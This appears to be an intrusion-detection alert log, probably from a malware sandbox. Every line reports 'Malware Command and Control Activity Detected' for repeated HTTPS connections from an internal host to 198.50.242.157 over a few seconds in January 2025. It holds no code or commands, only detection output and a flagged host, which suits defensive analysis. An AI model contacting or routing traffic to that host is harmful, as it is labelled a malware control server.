                  2025-01-11T20:07:47.038314+010020327761Malware Command and Control Activity Detected192.168.2.449792198.50.242.157443TCP
                  2025-01-11T20:07:47.554168+010020327761Malware Command and Control Activity Detected192.168.2.449793198.50.242.157443TCP
                  2025-01-11T20:07:48.054160+010020327761Malware Command and Control Activity Detected192.168.2.449794198.50.242.157443TCP
                  2025-01-11T20:07:48.560804+010020327761Malware Command and Control Activity Detected192.168.2.449795198.50.242.157443TCP
                  2025-01-11T20:07:49.241191+010020327761Malware Command and Control Activity Detected192.168.2.449796198.50.242.157443TCP
                  2025-01-11T20:07:49.694331+010020327761Malware Command and Control Activity Detected192.168.2.449797198.50.242.157443TCP
                  2025-01-11T20:07:50.131834+010020327761Malware Command and Control Activity Detected192.168.2.449798198.50.242.157443TCP
                  2025-01-11T20:07:50.553678+010020327761Malware Command and Control Activity Detected192.168.2.449799198.50.242.157443TCP
                  2025-01-11T20:07:50.975500+010020327761Malware Command and Control Activity Detected192.168.2.449800198.50.242.157443TCP
                  2025-01-11T20:07:51.366120+010020327761Malware Command and Control Activity Detected192.168.2.449801198.50.242.157443TCP
                  2025-01-11T20:07:51.756897+010020327761Malware Command and Control Activity Detected192.168.2.449802198.50.242.157443TCP
                  2025-01-11T20:07:52.131699+010020327761Malware Command and Control Activity Detected192.168.2.449803198.50.242.157443TCP
                  2025-01-11T20:07:52.491125+010020327761Malware Command and Control Activity Detected192.168.2.449804198.50.242.157443TCP
                  2025-01-11T20:07:52.835277+010020327761Malware Command and Control Activity Detected192.168.2.449806198.50.242.157443TCP
                  2025-01-11T20:07:53.200425+010020327761Malware Command and Control Activity Detected192.168.2.449807198.50.242.157443TCP
                  2025-01-11T20:07:53.522350+010020327761Malware Command and Control Activity Detected192.168.2.449808198.50.242.157443TCP
                  2025-01-11T20:07:53.834851+010020327761Malware Command and Control Activity Detected192.168.2.449809198.50.242.157443TCP
                  2025-01-11T20:07:54.131663+010020327761Malware Command and Control Activity Detected192.168.2.449810198.50.242.157443TCP
                  2025-01-11T20:07:54.428650+010020327761Malware Command and Control Activity Detected192.168.2.449811198.50.242.157443TCP
                  2025-01-11T20:07:54.709948+010020327761Malware Command and Control Activity Detected192.168.2.449813198.50.242.157443TCP
                  2025-01-11T20:07:54.991191+010020327761Malware Command and Control Activity Detected192.168.2.449814198.50.242.157443TCP
                  2025-01-11T20:07:55.256819+010020327761Malware Command and Control Activity Detected192.168.2.449815198.50.242.157443TCP
                  2025-01-11T20:07:55.522514+010020327761Malware Command and Control Activity Detected192.168.2.449816198.50.242.157443TCP
                  2025-01-11T20:07:55.788232+010020327761Malware Command and Control Activity Detected192.168.2.449822198.50.242.157443TCP
                  2025-01-11T20:07:56.038318+010020327761Malware Command and Control Activity Detected192.168.2.449823198.50.242.157443TCP
                  2025-01-11T20:07:56.272256+010020327761Malware Command and Control Activity Detected192.168.2.449824198.50.242.157443TCP
                  2025-01-11T20:07:56.490942+010020327761Malware Command and Control Activity Detected192.168.2.449826198.50.242.157443TCP
                  2025-01-11T20:07:56.709913+010020327761Malware Command and Control Activity Detected192.168.2.449831198.50.242.157443TCP
                  2025-01-11T20:07:56.928695+010020327761Malware Command and Control Activity Detected192.168.2.449832198.50.242.157443TCP
                  2025-01-11T20:07:57.132059+010020327761Malware Command and Control Activity Detected192.168.2.449833198.50.242.157443TCP
                  2025-01-11T20:07:57.334835+010020327761Malware Command and Control Activity Detected192.168.2.449838198.50.242.157443TCP
                  2025-01-11T20:07:57.522578+010020327761Malware Command and Control Activity Detected192.168.2.449840198.50.242.157443TCP
                  2025-01-11T20:07:57.709956+010020327761Malware Command and Control Activity Detected192.168.2.449841198.50.242.157443TCP
                  2025-01-11T20:07:57.897520+010020327761Malware Command and Control Activity Detected192.168.2.449842198.50.242.157443TCP
                  2025-01-11T20:07:58.069240+010020327761Malware Command and Control Activity Detected192.168.2.449847198.50.242.157443TCP
                  2025-01-11T20:07:58.240984+010020327761Malware Command and Control Activity Detected192.168.2.449849198.50.242.157443TCP
                  2025-01-11T20:07:58.397391+010020327761Malware Command and Control Activity Detected192.168.2.449850198.50.242.157443TCP
                  2025-01-11T20:07:58.553605+010020327761Malware Command and Control Activity Detected192.168.2.449851198.50.242.157443TCP
                  2025-01-11T20:07:58.710092+010020327761Malware Command and Control Activity Detected192.168.2.449852198.50.242.157443TCP
                  2025-01-11T20:07:58.866135+010020327761Malware Command and Control Activity Detected192.168.2.449857198.50.242.157443TCP
                  2025-01-11T20:07:59.006919+010020327761Malware Command and Control Activity Detected192.168.2.449859198.50.242.157443TCP
                  2025-01-11T20:07:59.147614+010020327761Malware Command and Control Activity Detected192.168.2.449860198.50.242.157443TCP
                  2025-01-11T20:07:59.288673+010020327761Malware Command and Control Activity Detected192.168.2.449861198.50.242.157443TCP
                  2025-01-11T20:07:59.413400+010020327761Malware Command and Control Activity Detected192.168.2.449862198.50.242.157443TCP
                  2025-01-11T20:07:59.553643+010020327761Malware Command and Control Activity Detected192.168.2.449864198.50.242.157443TCP
                  2025-01-11T20:07:59.678702+010020327761Malware Command and Control Activity Detected192.168.2.449868198.50.242.157443TCP
                  2025-01-11T20:07:59.803734+010020327761Malware Command and Control Activity Detected192.168.2.449870198.50.242.157443TCP
                  2025-01-11T20:07:59.912874+010020327761Malware Command and Control Activity Detected192.168.2.449871198.50.242.157443TCP
                  2025-01-11T20:08:00.022317+010020327761Malware Command and Control Activity Detected192.168.2.449872198.50.242.157443TCP
                  2025-01-11T20:08:00.131800+010020327761Malware Command and Control Activity Detected192.168.2.449873198.50.242.157443TCP
                  2025-01-11T20:08:00.240996+010020327761Malware Command and Control Activity Detected192.168.2.449874198.50.242.157443TCP
                  2025-01-11T20:08:00.350344+010020327761Malware Command and Control Activity Detected192.168.2.449878198.50.242.157443TCP
                  2025-01-11T20:08:00.459813+010020327761Malware Command and Control Activity Detected192.168.2.449881198.50.242.157443TCP
                  2025-01-11T20:08:00.553577+010020327761Malware Command and Control Activity Detected192.168.2.449882198.50.242.157443TCP
                  2025-01-11T20:08:00.647468+010020327761Malware Command and Control Activity Detected192.168.2.449883198.50.242.157443TCP
                  2025-01-11T20:08:00.740943+010020327761Malware Command and Control Activity Detected192.168.2.449884198.50.242.157443TCP
                  2025-01-11T20:08:00.834871+010020327761Malware Command and Control Activity Detected192.168.2.449885198.50.242.157443TCP
                  2025-01-11T20:08:00.912984+010020327761Malware Command and Control Activity Detected192.168.2.449886198.50.242.157443TCP
                  2025-01-11T20:08:00.990967+010020327761Malware Command and Control Activity Detected192.168.2.449887198.50.242.157443TCP
                  2025-01-11T20:08:01.069095+010020327761Malware Command and Control Activity Detected192.168.2.449888198.50.242.157443TCP
                  2025-01-11T20:08:01.149781+010020327761Malware Command and Control Activity Detected192.168.2.449892198.50.242.157443TCP
                  2025-01-11T20:08:01.225533+010020327761Malware Command and Control Activity Detected192.168.2.449894198.50.242.157443TCP
                  2025-01-11T20:08:01.303719+010020327761Malware Command and Control Activity Detected192.168.2.449896198.50.242.157443TCP
                  2025-01-11T20:08:01.404129+010020327761Malware Command and Control Activity Detected192.168.2.449897198.50.242.157443TCP
                  2025-01-11T20:08:01.481613+010020327761Malware Command and Control Activity Detected192.168.2.449898198.50.242.157443TCP
                  2025-01-11T20:08:01.632100+010020327761Malware Command and Control Activity Detected192.168.2.449899198.50.242.157443TCP
                  2025-01-11T20:08:01.709866+010020327761Malware Command and Control Activity Detected192.168.2.449900198.50.242.157443TCP
                  2025-01-11T20:08:01.772821+010020327761Malware Command and Control Activity Detected192.168.2.449901198.50.242.157443TCP
                  2025-01-11T20:08:01.834883+010020327761Malware Command and Control Activity Detected192.168.2.449903198.50.242.157443TCP
                  2025-01-11T20:08:01.897179+010020327761Malware Command and Control Activity Detected192.168.2.449906198.50.242.157443TCP
                  2025-01-11T20:08:01.959695+010020327761Malware Command and Control Activity Detected192.168.2.449908198.50.242.157443TCP
                  2025-01-11T20:08:02.022260+010020327761Malware Command and Control Activity Detected192.168.2.449910198.50.242.157443TCP
                  2025-01-11T20:08:02.084685+010020327761Malware Command and Control Activity Detected192.168.2.449911198.50.242.157443TCP
                  2025-01-11T20:08:02.132150+010020327761Malware Command and Control Activity Detected192.168.2.449912198.50.242.157443TCP
                  2025-01-11T20:08:02.178472+010020327761Malware Command and Control Activity Detected192.168.2.449913198.50.242.157443TCP
                  2025-01-11T20:08:02.225438+010020327761Malware Command and Control Activity Detected192.168.2.449914198.50.242.157443TCP
                  2025-01-11T20:08:02.275082+010020327761Malware Command and Control Activity Detected192.168.2.449915198.50.242.157443TCP
                  2025-01-11T20:08:02.319526+010020327761Malware Command and Control Activity Detected192.168.2.449916198.50.242.157443TCP
                  2025-01-11T20:08:02.366197+010020327761Malware Command and Control Activity Detected192.168.2.449917198.50.242.157443TCP
                  2025-01-11T20:08:02.413069+010020327761Malware Command and Control Activity Detected192.168.2.449918198.50.242.157443TCP
                  2025-01-11T20:08:02.459776+010020327761Malware Command and Control Activity Detected192.168.2.449919198.50.242.157443TCP
                  2025-01-11T20:08:02.506903+010020327761Malware Command and Control Activity Detected192.168.2.449920198.50.242.157443TCP
                  2025-01-11T20:08:02.553755+010020327761Malware Command and Control Activity Detected192.168.2.449921198.50.242.157443TCP
                  2025-01-11T20:08:02.603544+010020327761Malware Command and Control Activity Detected192.168.2.449924198.50.242.157443TCP
                  2025-01-11T20:08:02.651580+010020327761Malware Command and Control Activity Detected192.168.2.449925198.50.242.157443TCP
                  2025-01-11T20:08:02.694068+010020327761Malware Command and Control Activity Detected192.168.2.449927198.50.242.157443TCP
                  2025-01-11T20:08:02.725529+010020327761Malware Command and Control Activity Detected192.168.2.449928198.50.242.157443TCP
                  2025-01-11T20:08:02.756544+010020327761Malware Command and Control Activity Detected192.168.2.449931198.50.242.157443TCP
                  2025-01-11T20:08:02.788077+010020327761Malware Command and Control Activity Detected192.168.2.449932198.50.242.157443TCP
                  2025-01-11T20:08:02.824863+010020327761Malware Command and Control Activity Detected192.168.2.449933198.50.242.157443TCP
                  2025-01-11T20:08:02.866713+010020327761Malware Command and Control Activity Detected192.168.2.449934198.50.242.157443TCP
                  2025-01-11T20:08:02.897339+010020327761Malware Command and Control Activity Detected192.168.2.449935198.50.242.157443TCP
                  2025-01-11T20:08:02.928650+010020327761Malware Command and Control Activity Detected192.168.2.449936198.50.242.157443TCP
                  2025-01-11T20:08:02.959852+010020327761Malware Command and Control Activity Detected192.168.2.449937198.50.242.157443TCP
                  2025-01-11T20:08:02.991018+010020327761Malware Command and Control Activity Detected192.168.2.449938198.50.242.157443TCP
                  2025-01-11T20:08:03.022363+010020327761Malware Command and Control Activity Detected192.168.2.449939198.50.242.157443TCP
                  2025-01-11T20:08:03.053439+010020327761Malware Command and Control Activity Detected192.168.2.449940198.50.242.157443TCP
                  2025-01-11T20:08:03.087871+010020327761Malware Command and Control Activity Detected192.168.2.449941198.50.242.157443TCP
                  2025-01-11T20:08:03.117155+010020327761Malware Command and Control Activity Detected192.168.2.449942198.50.242.157443TCP
                  2025-01-11T20:08:03.147516+010020327761Malware Command and Control Activity Detected192.168.2.449943198.50.242.157443TCP
                  2025-01-11T20:08:03.178885+010020327761Malware Command and Control Activity Detected192.168.2.449944198.50.242.157443TCP
                  2025-01-11T20:08:03.210196+010020327761Malware Command and Control Activity Detected192.168.2.449945198.50.242.157443TCP
                  2025-01-11T20:08:03.241646+010020327761Malware Command and Control Activity Detected192.168.2.449946198.50.242.157443TCP
                  2025-01-11T20:08:03.272173+010020327761Malware Command and Control Activity Detected192.168.2.449947198.50.242.157443TCP
                  2025-01-11T20:08:03.303483+010020327761Malware Command and Control Activity Detected192.168.2.449948198.50.242.157443TCP
                  2025-01-11T20:08:03.334619+010020327761Malware Command and Control Activity Detected192.168.2.449949198.50.242.157443TCP
                  2025-01-11T20:08:03.350349+010020327761Malware Command and Control Activity Detected192.168.2.449950198.50.242.157443TCP
                  2025-01-11T20:08:03.365991+010020327761Malware Command and Control Activity Detected192.168.2.449951198.50.242.157443TCP
                  2025-01-11T20:08:03.397270+010020327761Malware Command and Control Activity Detected192.168.2.449954198.50.242.157443TCP
                  2025-01-11T20:08:03.412730+010020327761Malware Command and Control Activity Detected192.168.2.449955198.50.242.157443TCP
                  2025-01-11T20:08:03.428651+010020327761Malware Command and Control Activity Detected192.168.2.449956198.50.242.157443TCP
                  2025-01-11T20:08:03.447062+010020327761Malware Command and Control Activity Detected192.168.2.449957198.50.242.157443TCP
                  2025-01-11T20:08:03.478402+010020327761Malware Command and Control Activity Detected192.168.2.449958198.50.242.157443TCP
                  2025-01-11T20:08:03.534557+010020327761Malware Command and Control Activity Detected192.168.2.449961198.50.242.157443TCP
                  2025-01-11T20:08:03.554085+010020327761Malware Command and Control Activity Detected192.168.2.449963198.50.242.157443TCP
                  2025-01-11T20:08:03.569178+010020327761Malware Command and Control Activity Detected192.168.2.449964198.50.242.157443TCP
                  2025-01-11T20:08:03.584759+010020327761Malware Command and Control Activity Detected192.168.2.449965198.50.242.157443TCP
                  2025-01-11T20:08:03.600277+010020327761Malware Command and Control Activity Detected192.168.2.449966198.50.242.157443TCP
                  2025-01-11T20:08:03.616290+010020327761Malware Command and Control Activity Detected192.168.2.449967198.50.242.157443TCP
                  2025-01-11T20:08:03.631591+010020327761Malware Command and Control Activity Detected192.168.2.449968198.50.242.157443TCP
                  2025-01-11T20:08:03.647233+010020327761Malware Command and Control Activity Detected192.168.2.449969198.50.242.157443TCP
                  2025-01-11T20:08:03.663155+010020327761Malware Command and Control Activity Detected192.168.2.449970198.50.242.157443TCP
                  2025-01-11T20:08:03.679502+010020327761Malware Command and Control Activity Detected192.168.2.449971198.50.242.157443TCP
                  2025-01-11T20:08:03.694875+010020327761Malware Command and Control Activity Detected192.168.2.449972198.50.242.157443TCP
                  2025-01-11T20:08:03.714487+010020327761Malware Command and Control Activity Detected192.168.2.449973198.50.242.157443TCP
                  2025-01-11T20:08:03.741079+010020327761Malware Command and Control Activity Detected192.168.2.449974198.50.242.157443TCP
                  2025-01-11T20:08:03.757057+010020327761Malware Command and Control Activity Detected192.168.2.449975198.50.242.157443TCP
                  2025-01-11T20:08:03.772435+010020327761Malware Command and Control Activity Detected192.168.2.449976198.50.242.157443TCP
                  2025-01-11T20:08:03.787898+010020327761Malware Command and Control Activity Detected192.168.2.449977198.50.242.157443TCP
                  2025-01-11T20:08:03.803504+010020327761Malware Command and Control Activity Detected192.168.2.449978198.50.242.157443TCP
                  2025-01-11T20:08:03.821830+010020327761Malware Command and Control Activity Detected192.168.2.449979198.50.242.157443TCP
                  2025-01-11T20:08:03.834832+010020327761Malware Command and Control Activity Detected192.168.2.449980198.50.242.157443TCP
                  2025-01-11T20:08:03.853649+010020327761Malware Command and Control Activity Detected192.168.2.449981198.50.242.157443TCP
                  2025-01-11T20:08:03.877356+010020327761Malware Command and Control Activity Detected192.168.2.449982198.50.242.157443TCP
                  2025-01-11T20:08:03.897533+010020327761Malware Command and Control Activity Detected192.168.2.449983198.50.242.157443TCP
                  2025-01-11T20:08:03.913003+010020327761Malware Command and Control Activity Detected192.168.2.449984198.50.242.157443TCP
                  2025-01-11T20:08:03.928476+010020327761Malware Command and Control Activity Detected192.168.2.449985198.50.242.157443TCP
                  2025-01-11T20:08:03.944155+010020327761Malware Command and Control Activity Detected192.168.2.449986198.50.242.157443TCP
                  2025-01-11T20:08:03.960039+010020327761Malware Command and Control Activity Detected192.168.2.449987198.50.242.157443TCP
                  2025-01-11T20:08:03.975345+010020327761Malware Command and Control Activity Detected192.168.2.449988198.50.242.157443TCP
                  2025-01-11T20:08:03.991112+010020327761Malware Command and Control Activity Detected192.168.2.449989198.50.242.157443TCP
                  2025-01-11T20:08:04.006586+010020327761Malware Command and Control Activity Detected192.168.2.449990198.50.242.157443TCP
                  2025-01-11T20:08:04.022366+010020327761Malware Command and Control Activity Detected192.168.2.449991198.50.242.157443TCP
                  2025-01-11T20:08:04.038252+010020327761Malware Command and Control Activity Detected192.168.2.449992198.50.242.157443TCP
                  2025-01-11T20:08:04.053715+010020327761Malware Command and Control Activity Detected192.168.2.449993198.50.242.157443TCP
                  2025-01-11T20:08:04.070575+010020327761Malware Command and Control Activity Detected192.168.2.449994198.50.242.157443TCP
                  2025-01-11T20:08:04.084654+010020327761Malware Command and Control Activity Detected192.168.2.449995198.50.242.157443TCP
                  2025-01-11T20:08:04.101183+010020327761Malware Command and Control Activity Detected192.168.2.449996198.50.242.157443TCP
                  2025-01-11T20:08:04.116020+010020327761Malware Command and Control Activity Detected192.168.2.449997198.50.242.157443TCP
                  2025-01-11T20:08:04.131556+010020327761Malware Command and Control Activity Detected192.168.2.449999198.50.242.157443TCP
                  2025-01-11T20:08:04.147098+010020327761Malware Command and Control Activity Detected192.168.2.450000198.50.242.157443TCP
                  2025-01-11T20:08:04.165771+010020327761Malware Command and Control Activity Detected192.168.2.450002198.50.242.157443TCP
                  2025-01-11T20:08:04.178524+010020327761Malware Command and Control Activity Detected192.168.2.450003198.50.242.157443TCP
                  2025-01-11T20:08:04.197042+010020327761Malware Command and Control Activity Detected192.168.2.450004198.50.242.157443TCP
                  2025-01-11T20:08:04.220483+010020327761Malware Command and Control Activity Detected192.168.2.450005198.50.242.157443TCP
                  2025-01-11T20:08:04.225398+010020327761Malware Command and Control Activity Detected192.168.2.450006198.50.242.157443TCP
                  2025-01-11T20:08:04.241175+010020327761Malware Command and Control Activity Detected192.168.2.450007198.50.242.157443TCP
                  2025-01-11T20:08:04.256529+010020327761Malware Command and Control Activity Detected192.168.2.450010198.50.242.157443TCP
                  2025-01-11T20:08:04.272227+010020327761Malware Command and Control Activity Detected192.168.2.450011198.50.242.157443TCP
                  2025-01-11T20:08:04.288367+010020327761Malware Command and Control Activity Detected192.168.2.450012198.50.242.157443TCP
                  2025-01-11T20:08:04.303646+010020327761Malware Command and Control Activity Detected192.168.2.450013198.50.242.157443TCP
                  2025-01-11T20:08:04.319421+010020327761Malware Command and Control Activity Detected192.168.2.450014198.50.242.157443TCP
                  2025-01-11T20:08:04.334746+010020327761Malware Command and Control Activity Detected192.168.2.450016198.50.242.157443TCP
                  2025-01-11T20:08:04.350361+010020327761Malware Command and Control Activity Detected192.168.2.450017198.50.242.157443TCP
                  2025-01-11T20:08:04.366665+010020327761Malware Command and Control Activity Detected192.168.2.450018198.50.242.157443TCP
                  2025-01-11T20:08:04.382195+010020327761Malware Command and Control Activity Detected192.168.2.450019198.50.242.157443TCP
                  2025-01-11T20:08:04.397460+010020327761Malware Command and Control Activity Detected192.168.2.450020198.50.242.157443TCP
                  2025-01-11T20:08:04.412957+010020327761Malware Command and Control Activity Detected192.168.2.450021198.50.242.157443TCP
                  2025-01-11T20:08:04.428402+010020327761Malware Command and Control Activity Detected192.168.2.450022198.50.242.157443TCP
                  2025-01-11T20:08:04.444097+010020327761Malware Command and Control Activity Detected192.168.2.450023198.50.242.157443TCP
                  2025-01-11T20:08:04.459825+010020327761Malware Command and Control Activity Detected192.168.2.450024198.50.242.157443TCP
                  2025-01-11T20:08:04.475285+010020327761Malware Command and Control Activity Detected192.168.2.450025198.50.242.157443TCP
                  2025-01-11T20:08:04.490891+010020327761Malware Command and Control Activity Detected192.168.2.450026198.50.242.157443TCP
                  2025-01-11T20:08:04.509036+010020327761Malware Command and Control Activity Detected192.168.2.450027198.50.242.157443TCP
                  2025-01-11T20:08:04.524492+010020327761Malware Command and Control Activity Detected192.168.2.450028198.50.242.157443TCP
                  2025-01-11T20:08:04.538512+010020327761Malware Command and Control Activity Detected192.168.2.450029198.50.242.157443TCP
                  2025-01-11T20:08:04.553450+010020327761Malware Command and Control Activity Detected192.168.2.450030198.50.242.157443TCP
                  2025-01-11T20:08:04.569055+010020327761Malware Command and Control Activity Detected192.168.2.450031198.50.242.157443TCP
                  2025-01-11T20:08:04.584670+010020327761Malware Command and Control Activity Detected192.168.2.450032198.50.242.157443TCP
                  2025-01-11T20:08:04.600445+010020327761Malware Command and Control Activity Detected192.168.2.450033198.50.242.157443TCP
                  2025-01-11T20:08:04.616935+010020327761Malware Command and Control Activity Detected192.168.2.450034198.50.242.157443TCP
                  2025-01-11T20:08:04.631881+010020327761Malware Command and Control Activity Detected192.168.2.450035198.50.242.157443TCP
                  2025-01-11T20:08:04.647156+010020327761Malware Command and Control Activity Detected192.168.2.450036198.50.242.157443TCP
                  2025-01-11T20:08:04.663504+010020327761Malware Command and Control Activity Detected192.168.2.450037198.50.242.157443TCP
                  2025-01-11T20:08:04.680356+010020327761Malware Command and Control Activity Detected192.168.2.450038198.50.242.157443TCP
                  2025-01-11T20:08:04.694216+010020327761Malware Command and Control Activity Detected192.168.2.450039198.50.242.157443TCP
                  2025-01-11T20:08:04.710152+010020327761Malware Command and Control Activity Detected192.168.2.450040198.50.242.157443TCP
                  2025-01-11T20:08:04.725906+010020327761Malware Command and Control Activity Detected192.168.2.450041198.50.242.157443TCP
                  2025-01-11T20:08:04.740908+010020327761Malware Command and Control Activity Detected192.168.2.450042198.50.242.157443TCP
                  2025-01-11T20:08:04.756542+010020327761Malware Command and Control Activity Detected192.168.2.450043198.50.242.157443TCP
                  2025-01-11T20:08:04.772575+010020327761Malware Command and Control Activity Detected192.168.2.450044198.50.242.157443TCP
                  2025-01-11T20:08:04.788222+010020327761Malware Command and Control Activity Detected192.168.2.450045198.50.242.157443TCP
                  2025-01-11T20:08:04.803606+010020327761Malware Command and Control Activity Detected192.168.2.450046198.50.242.157443TCP
                  2025-01-11T20:08:04.818970+010020327761Malware Command and Control Activity Detected192.168.2.450047198.50.242.157443TCP
                  2025-01-11T20:08:04.834799+010020327761Malware Command and Control Activity Detected192.168.2.450048198.50.242.157443TCP
                  2025-01-11T20:08:04.852574+010020327761Malware Command and Control Activity Detected192.168.2.450049198.50.242.157443TCP
                  2025-01-11T20:08:04.875173+010020327761Malware Command and Control Activity Detected192.168.2.450050198.50.242.157443TCP
                  2025-01-11T20:08:04.890576+010020327761Malware Command and Control Activity Detected192.168.2.450051198.50.242.157443TCP
                  2025-01-11T20:08:04.897692+010020327761Malware Command and Control Activity Detected192.168.2.450052198.50.242.157443TCP
                  2025-01-11T20:08:04.912785+010020327761Malware Command and Control Activity Detected192.168.2.450054198.50.242.157443TCP
                  2025-01-11T20:08:04.928466+010020327761Malware Command and Control Activity Detected192.168.2.450056198.50.242.157443TCP
                  2025-01-11T20:08:04.929425+010020327761Malware Command and Control Activity Detected192.168.2.450057198.50.242.157443TCP
                  2025-01-11T20:08:04.930471+010020327761Malware Command and Control Activity Detected192.168.2.450058198.50.242.157443TCP
                  2025-01-11T20:08:04.931790+010020327761Malware Command and Control Activity Detected192.168.2.450059198.50.242.157443TCP
                  2025-01-11T20:08:04.932928+010020327761Malware Command and Control Activity Detected192.168.2.450060198.50.242.157443TCP
                  2025-01-11T20:08:04.934654+010020327761Malware Command and Control Activity Detected192.168.2.450061198.50.242.157443TCP
                  2025-01-11T20:08:04.935427+010020327761Malware Command and Control Activity Detected192.168.2.450062198.50.242.157443TCP
                  2025-01-11T20:08:04.936490+010020327761Malware Command and Control Activity Detected192.168.2.450063198.50.242.157443TCP
                  2025-01-11T20:08:04.937605+010020327761Malware Command and Control Activity Detected192.168.2.450064198.50.242.157443TCP
                  2025-01-11T20:08:04.938680+010020327761Malware Command and Control Activity Detected192.168.2.450065198.50.242.157443TCP
                  2025-01-11T20:08:04.940281+010020327761Malware Command and Control Activity Detected192.168.2.450066198.50.242.157443TCP
                  2025-01-11T20:08:04.941459+010020327761Malware Command and Control Activity Detected192.168.2.450067198.50.242.157443TCP
                  2025-01-11T20:08:04.942461+010020327761Malware Command and Control Activity Detected192.168.2.450068198.50.242.157443TCP
                  2025-01-11T20:08:04.944008+010020327761Malware Command and Control Activity Detected192.168.2.450069198.50.242.157443TCP
                  2025-01-11T20:08:04.945346+010020327761Malware Command and Control Activity Detected192.168.2.450070198.50.242.157443TCP
                  2025-01-11T20:08:04.946568+010020327761Malware Command and Control Activity Detected192.168.2.450071198.50.242.157443TCP
                  2025-01-11T20:08:04.947908+010020327761Malware Command and Control Activity Detected192.168.2.450072198.50.242.157443TCP
                  2025-01-11T20:08:04.948909+010020327761Malware Command and Control Activity Detected192.168.2.450073198.50.242.157443TCP
                  2025-01-11T20:08:04.950062+010020327761Malware Command and Control Activity Detected192.168.2.450074198.50.242.157443TCP
                  2025-01-11T20:08:04.951147+010020327761Malware Command and Control Activity Detected192.168.2.450075198.50.242.157443TCP
                  2025-01-11T20:08:04.952686+010020327761Malware Command and Control Activity Detected192.168.2.450076198.50.242.157443TCP
                  2025-01-11T20:08:04.953573+010020327761Malware Command and Control Activity Detected192.168.2.450077198.50.242.157443TCP
                  2025-01-11T20:08:04.954651+010020327761Malware Command and Control Activity Detected192.168.2.450078198.50.242.157443TCP
                  2025-01-11T20:08:04.955624+010020327761Malware Command and Control Activity Detected192.168.2.450079198.50.242.157443TCP
                  2025-01-11T20:08:04.956996+010020327761Malware Command and Control Activity Detected192.168.2.450080198.50.242.157443TCP
                  2025-01-11T20:08:04.957907+010020327761Malware Command and Control Activity Detected192.168.2.450081198.50.242.157443TCP
                  2025-01-11T20:08:04.958728+010020327761Malware Command and Control Activity Detected192.168.2.450082198.50.242.157443TCP
                  2025-01-11T20:08:04.959767+010020327761Malware Command and Control Activity Detected192.168.2.450083198.50.242.157443TCP
                  2025-01-11T20:08:04.961009+010020327761Malware Command and Control Activity Detected192.168.2.450084198.50.242.157443TCP
                  2025-01-11T20:08:04.962613+010020327761Malware Command and Control Activity Detected192.168.2.450085198.50.242.157443TCP
                  2025-01-11T20:08:04.963771+010020327761Malware Command and Control Activity Detected192.168.2.450086198.50.242.157443TCP
                  2025-01-11T20:08:04.965026+010020327761Malware Command and Control Activity Detected192.168.2.450087198.50.242.157443TCP
                  2025-01-11T20:08:04.965919+010020327761Malware Command and Control Activity Detected192.168.2.450088198.50.242.157443TCP
                  2025-01-11T20:08:04.967497+010020327761Malware Command and Control Activity Detected192.168.2.450089198.50.242.157443TCP
                  2025-01-11T20:08:04.969086+010020327761Malware Command and Control Activity Detected192.168.2.450090198.50.242.157443TCP
                  2025-01-11T20:08:04.970202+010020327761Malware Command and Control Activity Detected192.168.2.450091198.50.242.157443TCP
                  2025-01-11T20:08:04.971726+010020327761Malware Command and Control Activity Detected192.168.2.450092198.50.242.157443TCP
                  2025-01-11T20:08:04.973020+010020327761Malware Command and Control Activity Detected192.168.2.450093198.50.242.157443TCP
                  2025-01-11T20:08:04.974193+010020327761Malware Command and Control Activity Detected192.168.2.450094198.50.242.157443TCP
                  2025-01-11T20:08:04.975151+010020327761Malware Command and Control Activity Detected192.168.2.450095198.50.242.157443TCP
                  2025-01-11T20:08:04.976275+010020327761Malware Command and Control Activity Detected192.168.2.450096198.50.242.157443TCP
                  2025-01-11T20:08:04.977314+010020327761Malware Command and Control Activity Detected192.168.2.450097198.50.242.157443TCP
                  2025-01-11T20:08:04.978556+010020327761Malware Command and Control Activity Detected192.168.2.450098198.50.242.157443TCP
                  2025-01-11T20:08:04.979532+010020327761Malware Command and Control Activity Detected192.168.2.450099198.50.242.157443TCP
                  2025-01-11T20:08:04.981603+010020327761Malware Command and Control Activity Detected192.168.2.450100198.50.242.157443TCP
                  2025-01-11T20:08:04.982842+010020327761Malware Command and Control Activity Detected192.168.2.450101198.50.242.157443TCP
                  2025-01-11T20:08:04.983862+010020327761Malware Command and Control Activity Detected192.168.2.450102198.50.242.157443TCP
                  2025-01-11T20:08:04.985027+010020327761Malware Command and Control Activity Detected192.168.2.450103198.50.242.157443TCP
                  2025-01-11T20:08:04.986359+010020327761Malware Command and Control Activity Detected192.168.2.450104198.50.242.157443TCP
                  2025-01-11T20:08:04.987509+010020327761Malware Command and Control Activity Detected192.168.2.450105198.50.242.157443TCP
                  2025-01-11T20:08:04.988704+010020327761Malware Command and Control Activity Detected192.168.2.450106198.50.242.157443TCP
                  2025-01-11T20:08:04.989916+010020327761Malware Command and Control Activity Detected192.168.2.450107198.50.242.157443TCP
                  2025-01-11T20:08:04.991050+010020327761Malware Command and Control Activity Detected192.168.2.450108198.50.242.157443TCP
                  2025-01-11T20:08:04.992651+010020327761Malware Command and Control Activity Detected192.168.2.450109198.50.242.157443TCP
                  2025-01-11T20:08:04.993751+010020327761Malware Command and Control Activity Detected192.168.2.450110198.50.242.157443TCP
                  2025-01-11T20:08:04.994969+010020327761Malware Command and Control Activity Detected192.168.2.450111198.50.242.157443TCP
                  2025-01-11T20:08:04.996423+010020327761Malware Command and Control Activity Detected192.168.2.450112198.50.242.157443TCP
                  2025-01-11T20:08:04.997875+010020327761Malware Command and Control Activity Detected192.168.2.450113198.50.242.157443TCP
                  2025-01-11T20:08:04.999204+010020327761Malware Command and Control Activity Detected192.168.2.450114198.50.242.157443TCP
                  2025-01-11T20:08:05.001049+010020327761Malware Command and Control Activity Detected192.168.2.450115198.50.242.157443TCP
                  2025-01-11T20:08:05.002379+010020327761Malware Command and Control Activity Detected192.168.2.450116198.50.242.157443TCP
                  2025-01-11T20:08:05.003545+010020327761Malware Command and Control Activity Detected192.168.2.450117198.50.242.157443TCP
                  2025-01-11T20:08:05.005039+010020327761Malware Command and Control Activity Detected192.168.2.450118198.50.242.157443TCP
                  2025-01-11T20:08:05.006581+010020327761Malware Command and Control Activity Detected192.168.2.450119198.50.242.157443TCP
                  2025-01-11T20:08:05.007671+010020327761Malware Command and Control Activity Detected192.168.2.450120198.50.242.157443TCP
                  2025-01-11T20:08:05.010220+010020327761Malware Command and Control Activity Detected192.168.2.450122198.50.242.157443TCP
                  2025-01-11T20:08:05.011418+010020327761Malware Command and Control Activity Detected192.168.2.450123198.50.242.157443TCP
